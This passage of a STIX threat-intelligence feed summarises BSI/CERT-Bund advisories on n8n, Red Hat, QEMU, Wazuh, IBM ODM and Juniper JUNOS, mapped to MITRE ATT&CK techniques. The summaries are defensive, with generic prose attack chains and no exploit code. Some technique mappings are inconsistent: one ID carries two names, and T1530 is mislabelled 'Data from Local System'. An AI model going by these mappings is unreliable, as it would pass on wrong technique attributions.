      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ea962228-f781-5c96-9aa3-025bda9e03ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--737c1de6-ce37-5400-82ec-625b339ae262",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f27e1b65-3d3d-54d0-95f2-358efa253ee8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--737c1de6-ce37-5400-82ec-625b339ae262",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--08034fb1-a440-5817-bcb0-e93e68f47ade",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Automated Exfiltration",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1020",
          "url": "https://attack.mitre.org/techniques/T1020"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6bd9cf23-fff7-51e5-9de6-0587d0d4cc03",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--737c1de6-ce37-5400-82ec-625b339ae262",
      "target_ref": "attack-pattern--08034fb1-a440-5817-bcb0-e93e68f47ade"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Inhibit System Recovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1490",
          "url": "https://attack.mitre.org/techniques/T1490"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--69c8b805-20be-58da-b089-eb5bb39232be",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--737c1de6-ce37-5400-82ec-625b339ae262",
      "target_ref": "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--70a6da41-9e60-5c5a-90cb-19159711def0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--737c1de6-ce37-5400-82ec-625b339ae262",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--737c1de6-ce37-5400-82ec-625b339ae262",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "n8n: Multiple Vulnerabilities",
      "description": "## Overview\n\nThe German Federal Office for Information Security (BSI) has issued a high-severity alert regarding multiple vulnerabilities within the n8n automation platform. These flaws can be leveraged by a remote, authenticated attacker. While specific CVEs were not detailed in the advisory, the vulnerabilities collectively enable SQL injection, circumvention of security controls, unauthorized disclosure of sensitive data, data manipulation, and denial-of-service attacks. The requirement for prior authentication means an attacker would first need to gain access to a legitimate user's credentials or compromise a session. The widespread use of n8n in enterprise automation workflows makes these vulnerabilities particularly critical, as successful exploitation could lead to significant data breaches, operational disruption, and integrity compromises across integrated systems. Defenders should prioritize patching and robust authentication measures.\n\n## Attack Chain\n\n[No detailed attack chain available in the source material. The advisory describes potential exploit outcomes rather than a step-by-step process.]\n\n## Impact\n\nShould an attacker successfully exploit these vulnerabilities, organizations utilizing n8n could face severe consequences. The ability to perform SQL injection implies a risk of full database compromise, leading to mass exfiltration of sensitive user data, customer records, or proprietary business logic. Bypassing security measures could allow the attacker to escalate privileges or move laterally within the n8n environment and potentially connected systems. Data manipulation could lead to fraudulent transactions, corrupted business records, or altered automation workflows, causing operational chaos and financial loss. Finally, the threat of denial-of-service could render critical automation processes inoperable, severely disrupting business continuity.\n\n## Recommendation\n\n* Prioritize updating all n8n instances to the latest secure version immediately to address the underlying vulnerabilities.\n* Implement strong authentication policies, including multi-factor authentication, for all n8n users to mitigate the risk posed by authenticated attackers.\n* Monitor n8n application logs for unusual activities, failed authentication attempts, and SQL injection patterns.\n",
      "published": "2026-07-09T08:33:44Z",
      "labels": [
        "vulnerability",
        "web-application",
        "sql-injection",
        "data-exfiltration",
        "denial-of-service",
        "n8n",
        "authentication-bypass"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--08034fb1-a440-5817-bcb0-e93e68f47ade",
        "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2067"
        },
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2267"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8f813cb0-a384-57be-ae13-fbdfd793caa0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8de89a70-6cac-5301-acab-31acc2e6aa01",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--8de89a70-6cac-5301-acab-31acc2e6aa01",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Red Hat Enterprise Linux: Golang Component Vulnerability Enables Denial of Service",
      "description": "## Overview\n\nRed Hat has disclosed a medium-severity vulnerability affecting critical Golang components integrated within Red Hat OpenShift, Red Hat Ansible Automation Platform, and Red Hat Enterprise Linux. This flaw, while not yet assigned a CVE identifier, could be exploited by a remote, unauthenticated attacker to trigger a Denial of Service (DoS) condition. The vulnerability specifically targets the underlying Golang components, which are foundational to the operation of these Red Hat products. The ability for an attacker to remotely disrupt core services without authentication poses a significant risk to the availability and stability of affected systems. Defenders should prioritize understanding the implications for their deployments and apply necessary remediations to prevent service interruptions.\n\n## Impact\n\nA successful Denial of Service attack exploiting this Golang component vulnerability would result in the unavailability of affected Red Hat OpenShift, Red Hat Ansible Automation Platform, and Red Hat Enterprise Linux instances. For organizations relying on these platforms for critical applications, container orchestration, or automation tasks, the impact could be severe, leading to significant operational disruption, data processing halts, and potential financial losses due to downtime. The unauthenticated and remote nature of the exploit increases the risk, allowing attackers to disrupt services widely across exposed systems.\n\n## Recommendation\n\n* Prioritize applying vendor-provided patches or updates for Red Hat OpenShift, Red Hat Ansible Automation Platform, and Red Hat Enterprise Linux that address the underlying Golang component vulnerability as soon as they become available.\n* Review network exposure for affected Red Hat products and ensure that only necessary services are accessible externally, limiting the attack surface.\n* Implement robust monitoring for abnormal resource consumption or service interruptions on affected systems, which could indicate a Denial of Service attack.\n",
      "published": "2026-07-09T09:24:41Z",
      "labels": [
        "vulnerability",
        "denial-of-service",
        "red-hat",
        "linux"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-0681"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--78054fd3-03da-55b5-bc3a-fc2e0d18b089",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0aac0a02-c077-5b57-bab3-5466f1cc95c3",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--0aac0a02-c077-5b57-bab3-5466f1cc95c3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "QEMU and libvirt: Multiple Vulnerabilities",
      "description": "## Overview\n\nMultiple critical vulnerabilities have been identified in QEMU and libvirt, which can be leveraged by a local attacker. Published by the German Federal Office for Information Security (BSI/Cert-Bund) on July 9, 2026, these weaknesses allow for information disclosure and the bypassing of crucial security mechanisms. While the advisory does not detail specific CVEs or version numbers, exploitation could grant an attacker unauthorized access to sensitive data within virtualized environments or enable them to escalate privileges on the host system. This necessitates immediate attention for organizations utilizing QEMU and libvirt in their Linux-based virtualization infrastructure to mitigate the risk of system compromise and data exfiltration.\n\n## Impact\n\nSuccessful exploitation of these vulnerabilities can lead to significant compromise of virtualized environments. Attackers could gain unauthorized access to sensitive information residing within virtual machines or on the host system itself, leading to data breaches and privacy violations. Furthermore, bypassing security mechanisms could enable privilege escalation, granting the attacker higher-level control over the system, potentially resulting in full system compromise and persistent access. The lack of specific CVEs in the advisory means the full extent of the impact on specific versions is not yet detailed, but the 'high' severity indicates a serious risk to data integrity and system availability.\n\n## Recommendation\n\n* Prioritize and apply available security updates for QEMU and libvirt (affected products) to remediate the identified vulnerabilities.\n* Review system logs, particularly those related to QEMU and libvirt processes, for any anomalous behavior indicative of local exploitation attempts.\n",
      "published": "2026-07-09T09:25:38Z",
      "labels": [
        "vulnerability",
        "linux",
        "virtualization",
        "defense-evasion",
        "privilege-escalation",
        "collection"
      ],
      "object_refs": [
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2022-1722"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--17952cae-df94-5e40-ae0c-884f61c66479",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2d9fa657-9451-5254-9f2e-2cc23d4c4373",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1565",
          "url": "https://attack.mitre.org/techniques/T1565"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ee325df6-cf38-5f70-a741-8cc26b7087fb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2d9fa657-9451-5254-9f2e-2cc23d4c4373",
      "target_ref": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1530",
          "url": "https://attack.mitre.org/techniques/T1530"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c1d13a81-f596-503c-b006-6231c0d18976",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2d9fa657-9451-5254-9f2e-2cc23d4c4373",
      "target_ref": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--2d9fa657-9451-5254-9f2e-2cc23d4c4373",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Multiple Vulnerabilities in Red Hat Enterprise Linux Components libsolv and aardvark-dns",
      "description": "## Overview\n\nRed Hat Enterprise Linux (RHEL) is affected by multiple vulnerabilities residing within its `libsolv` and `aardvark-dns` components. These vulnerabilities could be exploited by an attacker to compromise system integrity and confidentiality. Specifically, successful exploitation may lead to a Denial of Service (DoS) condition, rendering the affected system or services unavailable. Additionally, attackers might be able to manipulate data on the system, potentially corrupting critical files or altering configurations, or gain unauthorized access to confidential information. The BSI, a high-confidence source, published this advisory on 2026-07-09, highlighting the importance of timely patching. While no specific CVEs or active exploitation details are provided, the potential for significant disruption and data compromise makes these vulnerabilities a concern for all organizations utilizing affected RHEL systems.\n\n## Impact\n\nThe identified vulnerabilities could result in a range of adverse effects on affected Red Hat Enterprise Linux systems. Should an attack succeed, organizations face the risk of Denial of Service, which can lead to significant operational disruption and financial losses due to service downtime. Furthermore, the potential for data manipulation could compromise data integrity, leading to untrustworthy data or system state corruption. The disclosure of confidential information represents a significant risk to privacy, regulatory compliance, and intellectual property. The scope of impact is potentially broad, affecting any system running vulnerable versions of RHEL with `libsolv` or `aardvark-dns` components.\n\n## Recommendation\n\n* Apply all available security updates from Red Hat for affected Red Hat Enterprise Linux systems, particularly those related to `libsolv` and `aardvark-dns`.\n* Implement robust patch management processes to ensure timely deployment of vendor-provided security fixes.\n* Monitor system logs for unusual activity, especially concerning resource consumption or unauthorized data access, which could indicate a Denial of Service or data manipulation attempt.\n",
      "published": "2026-07-09T09:40:15Z",
      "labels": [
        "vulnerability",
        "linux",
        "red-hat",
        "dos",
        "data-manipulation",
        "data-leak"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
        "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12",
        "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2247"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e4858023-a0ad-58df-94a5-029c737e39a4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9b7a3925-5398-5112-a0c7-51b5a94e81e5",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--9b7a3925-5398-5112-a0c7-51b5a94e81e5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Wazuh Denial of Service Vulnerability",
      "description": "## Overview\n\nA recent security advisory from the BSI (German Federal Office for Information Security) details a vulnerability within the Wazuh security monitoring platform. This flaw, while not yet assigned a CVE identifier, enables a remote attacker with valid authentication credentials to trigger a Denial of Service (DoS) condition. The specific mechanism of exploitation is not detailed in the advisory, but the impact points to a disruption of the Wazuh service. Such an attack could hinder an organization's ability to monitor its environment for security incidents, potentially masking ongoing or subsequent attacks. The advisory was published on July 9, 2026, and emphasizes the need for users to apply security updates as soon as they become available to mitigate this risk.\n\n## Impact\n\nSuccessful exploitation of this vulnerability would lead to a Denial of Service for the affected Wazuh instance. This means that security monitoring capabilities provided by Wazuh would be unavailable, potentially leaving an organization blind to ongoing security incidents or critical system failures. While no specific victim numbers or affected sectors were mentioned, any organization relying on Wazuh for security operations could experience a significant operational disruption and increased risk exposure during the period of service unavailability.\n\n## Recommendation\n\n* Regularly check the official Wazuh security advisories and update to the latest patched version immediately upon release to address the described vulnerability.\n* Implement robust authentication policies and multi-factor authentication for all Wazuh accounts to limit the risk of an authenticated attacker gaining access.\n* Monitor Wazuh system logs and metrics (e.g., CPU, memory, process status) for unusual activity or resource exhaustion that could indicate a Denial of Service attack.\n",
      "published": "2026-07-09T10:05:34Z",
      "labels": [
        "denial-of-service",
        "vulnerability",
        "wazuh"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2250"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cfa9fe6b-0eb3-55de-8a25-10299d2ba2ae",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cc58f2e0-0803-5ee5-84b0-02d3009b4b38",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d78b2463-7c93-50a4-ab8a-9f05fad6e113",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cc58f2e0-0803-5ee5-84b0-02d3009b4b38",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e87f78d9-0290-5203-95be-456718fa3048",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cc58f2e0-0803-5ee5-84b0-02d3009b4b38",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--821c1bc0-2a2a-5ef4-bdf9-083aedbe98b0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cc58f2e0-0803-5ee5-84b0-02d3009b4b38",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--cc58f2e0-0803-5ee5-84b0-02d3009b4b38",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "IBM Operational Decision Manager: Multiple Vulnerabilities Reported",
      "description": "## Overview\n\nThe German Federal Office for Information Security (BSI) has issued an advisory warning of multiple critical vulnerabilities identified in IBM Operational Decision Manager. These vulnerabilities, which currently lack specific CVE identifiers, present a significant risk to affected organizations. An attacker capable of exploiting these flaws could achieve a range of severe impacts, including arbitrary code execution (RCE) on the underlying system, elevation of privileges to gain unauthorized access, and disruption of services through denial of service (DoS) attacks. Furthermore, successful exploitation could lead to sensitive information disclosure, unauthorized manipulation of files, and the bypassing of existing security controls, potentially leading to full system compromise or data integrity loss. The advisory underscores the importance of immediate patching and mitigation.\n\n## Attack Chain\n\nThis advisory details multiple vulnerabilities and their potential impacts, rather than an observed attack campaign with specific steps. The following outlines the potential exploitation outcomes enabled by these vulnerabilities:\n\n1. An attacker identifies a vulnerable instance of IBM Operational Decision Manager.\n2. The attacker successfully exploits a vulnerability to achieve arbitrary code execution on the system.\n3. Following initial code execution, the attacker leverages another vulnerability to escalate privileges within the compromised environment.\n4. With elevated privileges, the attacker can perform further actions, such as manipulating critical system files.\n5. The attacker may also exploit vulnerabilities to bypass security measures, disabling or degrading defenses.\n6. The attacker could then cause a denial of service, rendering the affected IBM Operational Decision Manager instance unavailable.\n7. Alternatively, the attacker could exploit information disclosure vulnerabilities to exfiltrate sensitive data.\n8. The ultimate objective could range from data exfiltration and integrity compromise to complete system control and disruption of business operations.\n\n## Impact\n\nThe identified vulnerabilities in IBM Operational Decision Manager pose a severe threat, potentially allowing for complete compromise and disruption of business-critical systems. Successful exploitation can lead to unauthorized execution of arbitrary code, granting attackers full control over the affected application and potentially the underlying server. Privilege escalation would allow attackers to move laterally and gain access to sensitive resources. Information disclosure could lead to the exfiltration of proprietary data, customer information, or other confidential records. File manipulation could result in data corruption, defacement, or the deployment of ransomware. Furthermore, the ability to bypass security measures and perform denial of service attacks could severely impact system availability and integrity, causing significant operational downtime and reputational damage.\n\n## Recommendation\n\n* Prioritize applying all available patches and security updates released by IBM for Operational Decision Manager immediately upon their release to address these vulnerabilities.\n* Implement robust network segmentation to limit the blast radius in case of a successful exploit targeting IBM Operational Decision Manager instances.\n* Ensure proper access controls and least privilege principles are enforced for all accounts interacting with the IBM Operational Decision Manager.\n",
      "published": "2026-07-09T10:14:36Z",
      "labels": [
        "bsi",
        "vulnerability",
        "rce",
        "privilege-escalation",
        "denial-of-service",
        "data-exfiltration",
        "impact",
        "defense-evasion"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2260"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--866311ba-d235-5965-b398-3f6a5135ee52",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1498",
          "url": "https://attack.mitre.org/techniques/T1498"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--64a74d85-0857-5492-867c-ad656aed102c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--281beceb-bfbe-5db0-bec0-9b3304402537",
      "target_ref": "attack-pattern--866311ba-d235-5965-b398-3f6a5135ee52"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cb994a1b-1d1f-599b-b38b-a289940d18ba",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--281beceb-bfbe-5db0-bec0-9b3304402537",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--281beceb-bfbe-5db0-bec0-9b3304402537",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Juniper JUNOS and JUNOS Evolved: Multiple Critical Vulnerabilities",
      "description": "## Overview\n\nThis brief details multiple vulnerabilities identified by BSI/CERT-Bund in Juniper JUNOS and JUNOS Evolved operating systems, affecting a wide range of Juniper network devices including EX, MX, QFX, and SRX series. These flaws, published on 2026-07-09, could allow an unauthenticated attacker to achieve severe impacts such as Denial of Service (DoS), unauthorized information disclosure, and arbitrary code execution, as well as trigger undefined system behavior. The vulnerabilities collectively pose a significant risk to critical network infrastructure managed by Juniper devices, enabling attackers to disrupt operations, gain sensitive data, or compromise devices for further malicious activities.\n\n## Attack Chain\n\n1. **Reconnaissance**: An attacker identifies internet-facing Juniper network devices within a target's infrastructure that are running vulnerable JUNOS or JUNOS Evolved versions.\n2. **Vulnerability Identification**: The attacker identifies specific unpatched vulnerabilities in the targeted Juniper device's firmware or exposed services.\n3. **Exploit Crafting**: Malicious network packets or specifically crafted requests are prepared to trigger the identified flaws (e.g., malformed protocol headers, specific command sequences).\n4. **Initial Access/Exploitation**: The attacker sends the crafted network traffic to the vulnerable Juniper device's exposed interfaces (e.g., management ports, routing protocols, web interfaces).\n5. **Impact Trigger**: Depending on the specific vulnerability exploited, this traffic triggers a buffer overflow, logical error, or other flaw within the device's operating system or services.\n6. **Adverse Outcome**: The device enters a Denial of Service state, leaks sensitive configuration or user data, or executes arbitrary code supplied by the attacker.\n7. **Post-Exploitation (if RCE)**: If arbitrary code execution is achieved, the attacker can establish persistence, modify device configurations, pivot into the internal network, or deploy further malicious payloads.\n8. **Disruption/Exfiltration**: The final objective is achieved, ranging from network disruption (DoS) and data theft (information disclosure) to full system compromise and control.\n\n## Impact\n\nExploitation of these vulnerabilities can lead to severe consequences for organizations relying on Juniper network devices. A Denial of Service attack can cripple network operations, leading to significant downtime, loss of connectivity, and financial losses. Information disclosure could expose sensitive network configurations, user credentials, or other proprietary data, leading to compliance violations and further security breaches. Arbitrary code execution grants attackers full control over the compromised device, allowing them to establish backdoors, launch further attacks against internal systems, or manipulate network traffic, potentially compromising the entire network infrastructure.\n\n## Recommendation\n\n* Prioritize patching all affected Juniper JUNOS and JUNOS Evolved devices, including Juniper EX Series, MX Series, QFX Series, and SRX Series, as soon as vendor patches become available.\n* Implement robust network segmentation to limit the blast radius of compromised network devices and 